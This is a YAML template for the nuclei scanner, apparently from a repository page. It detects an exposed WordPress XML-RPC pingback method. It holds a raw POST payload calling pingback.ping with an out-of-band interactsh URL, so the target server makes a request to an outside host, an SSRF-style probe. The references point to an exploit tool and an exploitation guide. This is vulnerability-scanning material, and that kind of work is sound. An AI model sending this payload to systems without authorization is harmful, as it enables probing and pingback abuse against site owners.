nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detectio...

42 lines
1.3 KiB
YAML

id: wp-xmlrpc-pingback-detection
info:
name: Wordpress XMLRPC Pingback detection
author: pdteam
severity: info
description: WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks.
reference:
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
metadata:
max-request: 1
tags: wordpress,ssrf,oast,xmlrpc
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://{{interactsh-url}}</string>
</value>
</param>
<param>
<value>
<string>{{BaseURL}}/?p=1</string>
</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a0046304402204dfa653ba571fed5ce42b191a2069f0963385a24f8276d0c276d90ff750f52f2022049781dbe29e833c90847baf9db57c618395ea5d29e2ea161f025bffd24fd2946:922c64590222798bb761d5b6d8e72950